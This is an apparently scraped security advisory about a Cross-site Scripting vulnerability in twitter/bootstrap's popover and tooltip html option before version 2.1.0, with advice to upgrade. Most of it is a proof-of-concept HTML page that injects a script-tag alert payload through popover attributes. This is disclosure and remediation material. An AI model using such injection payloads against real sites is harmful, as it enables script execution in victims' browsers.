Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Cross-site Scripting (XSS) vulnerabilities in an interactive lesson.
Start learningUpgrade twitter/bootstrap
to version 2.1.0 or higher.
twitter/bootstrap is a
Affected versions of this package are vulnerable to Cross-site Scripting (XSS).
The html option for popovers/tooltips is unescaped when grabbed with jQuery's .attr()
method. This may allow attackers to exploit this vulnearbility
<!DOCTYPE html> <html lang="en"> <head> <title>Bootstrap Example</title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link href="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/css/bootstrap-combined.min.css" rel="stylesheet" integrity="sha384-G87n9a15LEsz+OvKCr10ldEbckfbCpr2gjYnZgCiKiwH0p/If1QkSURCTzubbt19" crossorigin="anonymous" /> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/js/bootstrap.min.js" integrity="sha384-2sVosMIQw67h8RBCTmE20BSl9j66nWwbH+2W/CKr8celILSNnEfJnJv2PKCdet3I" crossorigin="anonymous" ></script> </head> <body> <div class="container"> <h3>Popover Example</h3> <a href="#" data-toggle="popover" title="<script>alert('XSS')</script>" data-content="<script>alert('XSS')</script>" >Toggle popover</a > </div>
<script> $(document).ready(function() { $('[data-toggle="popover"]').popover(); }); </script>
</body> </html>